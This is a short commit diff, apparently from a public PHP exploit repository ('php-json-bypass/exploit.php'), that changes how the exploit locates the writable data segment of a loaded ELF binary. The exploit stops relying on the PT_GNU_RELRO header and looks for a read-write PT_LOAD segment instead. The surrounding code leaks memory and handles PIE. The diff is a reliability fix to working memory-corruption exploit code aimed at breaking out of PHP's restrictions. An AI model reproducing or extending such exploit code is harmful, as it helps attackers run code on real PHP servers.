Do not rely on PT_GNU_RELRO segment

Author: mm0r1

php-json-bypass/exploit.php

@@ -72,7 +72,7 @@ public function parse_elf($base) {
             $p_vaddr = $this->leak2($header, 0x10);
             $p_memsz = $this->leak2($header, 0x28);
 
-            if($p_type == 0x6474e552) { # PT_GNU_RELRO
+            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                 # handle pie
                 $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                 $data_size = $p_memsz;